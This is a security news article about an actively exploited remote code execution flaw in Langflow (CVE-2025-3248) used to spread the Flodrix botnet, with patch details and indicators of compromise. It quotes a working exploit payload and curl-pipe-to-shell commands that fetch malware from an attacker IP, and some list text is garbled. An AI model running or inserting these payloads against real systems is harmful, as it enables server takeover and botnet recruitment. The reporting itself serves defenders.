A critical remote code execution (RCE) vulnerability in Langflow (CVE-2025-3248) is being actively exploited to deploy the Flodrix botnet, enabling full system compromise and distributed denial-of-service (DDoS) attacks.
The flaw, rated 9.8 on the CVSS scale, affects Langflow versions <1.3.0 and allows unauthenticated attackers to execute arbitrary code via malicious API requests.
Trend Micro reports over 500 exposed instances globally, with threat actors leveraging Shodan/FOFA scans and open-source exploit code to infiltrate AI development environments.
The vulnerability resides in Langflow’s /api/v1/validate/code endpoint, which processes user-submitted Python code without authentication.
Attackers embed malicious payloads in function decorators or default arguments, exploiting Python’s ast.parse() and compile() functions to execute code during AST validation.
Example exploit payload:
python@exec("import os; os.system('curl http://80.66.75.121/docker | sh')")
def malicious_function():
pass
This code triggers a downloader script that fetches Flodrix binaries.
Langflow’s lack of input sanitization or sandboxing allows such payloads to execute with server privileges, enabling reconnaissance commands like whoami, printenv, and network interface enumeration.
Exploitation follows a structured pattern:
docker) downloads architecture-specific Flodrix binaries:bashcurl -s http://80.66.75.121:25565/docker | sh
qE6MGAbI) to hide C&C IPs, establishes TCP/UDP channels, and terminates competing processes like busybox or watchdog.The botnet supports six DDoS attack modes, including tcpraw udpplain, while evading detection through self-deletion and artifact removal.
Langflow 1.3.0 resolves CVE-2025-3248 by implementing JWT/API key authentication via the CurrentActiveUser dependency. The patch:
is_active flag/api/v1/validate/codeRecommended actions:
80.66.75.121 and 45.61.137.226| Risk Factor | Details |
|---|---|
| CVE Identifier | CVE-2025-3248 |
| CVSS Score | 9.8 (Critical) |
| Affected Versions | Langflow <1.3.0 |
| Impact | RCE, DDoS attacks, sensitive data exfiltration |
| Remediation | Patch to v1.3.0; implement network segmentation |
Security teams should deploy intrusion prevention filters (e.g., Trend Micro’s #45744) and hunt for Flodrix’s UDP notification patterns (KILLDETAIL|PID|PPID|...).
With AI infrastructure becoming a prime target, proactive vulnerability management is critical to prevent large-scale compromises.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
The post Hackers Exploit Langflow RCE Vulnerability to Deploy Flodrix Botnet appeared first on Cyber Security News.
Community members protest ahead of a special Box Elder County Commission meeting to discuss the…
IGN is on the ground in Paris all weekend, capturing all of the breaking news…
IGN is on the ground in Paris all weekend, capturing all of the breaking news…
Future These Companies Say AI Is Reviving Entry-Level Jobs, Not Killing ThemLindsay Ellis | The…
Marketing has always been about timing, relevance, and consistency. The challenge is that most teams…
Marketing has always been about timing, relevance, and consistency. The challenge is that most teams…
This website uses cookies.